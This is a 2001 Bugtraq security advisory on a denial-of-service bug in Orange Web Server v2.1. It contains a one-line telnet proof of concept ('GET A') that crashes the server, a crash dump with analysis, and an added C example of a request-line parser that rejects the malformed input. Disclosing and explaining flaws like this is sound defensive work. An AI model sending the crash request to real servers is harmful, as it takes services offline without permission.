Bugtraq mailing list archives

Orange Web Server v2.1 DoS


From: slipy () B10Z NET
Date: Tue, 27 Feb 2001 04:50:46 -0000

Introduction:

Orange Web Server v2.1 is a powerful yet lightweight 
web server that runs on all Windows platforms. Easy 
to set up and use, Orange Web Server can turn any PC 
into a web server. The httpd is based on GoAhead (c) 
technology.


The Vendors website is:
http://www.orangesoftware.net/orangewebserver.html


Problem: Denial of Service Attack

Orange Web Server v2.1 is vulnerable to a very simple 
Denial of Service attack: a single malformed request 
line (a method followed by one bare token, with no 
path and no HTTP version) makes the server exit at 
once with an invalid page fault. No authentication 
and no special client are needed; a plain telnet 
session is enough. See the example below.


Examples:

echo "GET A" | telnet 192.168.0.20 80

That single echo and pipe sends the request line 
"GET A" and produces the crash dialog below. Note the 
bytes at CS:EIP: f7 71 04 decodes to 
idiv dword ptr [ecx+4], and ECX is 0, so the server 
faults reading address 4 through a NULL pointer while 
handling the truncated request; it is not a 
divide-by-zero.

ORANGEWEBSERVER caused an invalid page fault 
in module ORANGEWEBSERVER.EXE at 
016f:00409694. 
Registers:
EAX=49703d50 CS=016f EIP=00409694 
EFLGS=00010246 EBX=009dfe84 SS=0177 
ESP=009dfbb8 EBP=009dfe8c ECX=00000000 
DS=0177 ESI=00416362 FS=84cf EDX=00000000 
ES=0177 EDI=00000000 GS=0000 Bytes at CS:EIP:
f7 71 04 5e 8b c2 c3 90 90 90 90 90 56 8b 74 24 
Stack dump:
00416350 004094a7 00000000 00416350 ffffffff 
009dfbf0 009dfe8c 009dfe84 00418644 ffffffff 
006d8e8c 00410b62 00000000 00416350 006d949c 
00000000 
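As an added illustration (this is not code from Orange Web Server or GoAhead, whose sources are not part of this advisory, and the real root cause of the fault is unconfirmed): a defensive request-line parser in C that validates every field before anything depends on it, so "GET A" is answered with a 400 instead of being acted on. Function names, the size limit and the sample inputs are the example's own.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

#define MAX_REQUEST_LINE 4096   /* limit chosen for this example */

/* Parsed request line. Fields point into the caller's buffer, which the
 * parser NUL-terminates in place; version is "" for an HTTP/0.9 request. */
typedef struct {
    const char *method;
    const char *uri;
    const char *version;
} request_line;

/* RFC 2616 token character: printable ASCII minus the separators. */
static int is_token_char(unsigned char c)
{
    return c > 0x20 && c < 0x7f && strchr("()<>@,;:\\\"/[]?={}", c) == NULL;
}

/* Split `line` (a C string of length `len`, CRLF optional) into method, URI
 * and version. Returns 0 on success or the HTTP status to answer with
 * (400, 414, 505). A short line such as "GET A" is refused, never used. */
int parse_request_line(char *line, size_t len, request_line *out)
{
    char *fields[3], *p, *sp;
    int nfields = 0;
    size_t i;

    memset(out, 0, sizeof *out);
    if (len > MAX_REQUEST_LINE)
        return 414;
    while (len > 0 && (line[len - 1] == '\n' || line[len - 1] == '\r'))
        len--;                              /* strip the line terminator */
    line[len] = '\0';
    for (i = 0; i < len; i++)               /* no control characters at all */
        if ((unsigned char)line[i] < 0x20 || line[i] == 0x7f)
            return 400;

    /* Split on single SP; a fourth field, a doubled or a trailing SP is an error. */
    p = line;
    while (*p) {
        if (nfields == 3)
            return 400;
        fields[nfields++] = p;
        sp = strchr(p, ' ');
        if (sp == NULL)
            break;
        *sp = '\0';
        p = sp + 1;
        if (*p == '\0' || *p == ' ')
            return 400;
    }
    if (nfields == 0)
        return 400;
    for (p = fields[0]; *p; p++)            /* method must be a token */
        if (!is_token_char((unsigned char)*p))
            return 400;
    if (nfields == 1)
        return 400;                         /* "GET" alone: no URI to serve */
    /* Only origin-form ("/path") or "*" URIs are accepted; "GET A" fails here. */
    if (fields[1][0] != '/' && strcmp(fields[1], "*") != 0)
        return 400;
    if (nfields == 2) {                     /* HTTP/0.9 simple request: GET only */
        if (strcmp(fields[0], "GET") != 0)
            return 400;
        out->method = fields[0]; out->uri = fields[1]; out->version = "";
        return 0;
    }
    p = fields[2];                          /* version must be HTTP/<d>.<d> */
    if (strlen(p) != 8 || strncmp(p, "HTTP/", 5) != 0 ||
        !isdigit((unsigned char)p[5]) || p[6] != '.' || !isdigit((unsigned char)p[7]))
        return 400;
    if (p[5] != '1')
        return 505;                         /* major version we do not speak */
    out->method = fields[0]; out->uri = fields[1]; out->version = fields[2];
    return 0;
}

/* Wrapper: parse a string literal via a private copy. `out` may be NULL. */
int classify(const char *s, request_line *out)
{
    static char buf[MAX_REQUEST_LINE + 2];
    request_line tmp;
    size_t n = strlen(s);

    if (n > MAX_REQUEST_LINE)
        return 414;
    memcpy(buf, s, n + 1);
    return parse_request_line(buf, n, out ? out : &tmp);
}

int main(void)
{
    /* Constructed inputs: the advisory's PoC line and two well-formed requests. */
    const char *samples[] = { "GET A", "GET /index.html HTTP/1.0", "GET /" };
    size_t k;
    for (k = 0; k < sizeof samples / sizeof samples[0]; k++) {
        request_line r;
        int st = classify(samples[k], &r);
        printf("%-26s -> %d %s\n", samples[k], st, st ? "" : r.uri);
    }
    return 0;
}
```

Running the block prints 400 for "GET A" and 0 with the parsed URI for the two valid lines. The point is the order of checks: field count and URI shape are verified before any field is read, so a request with a missing field can never reach code that assumes it is there.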


Solution:

The vendor has been notified; a reply is awaited. 

--------------------
b10z HTTPd Advisory
slipy () b10z net

Found: February 27th, 2001.

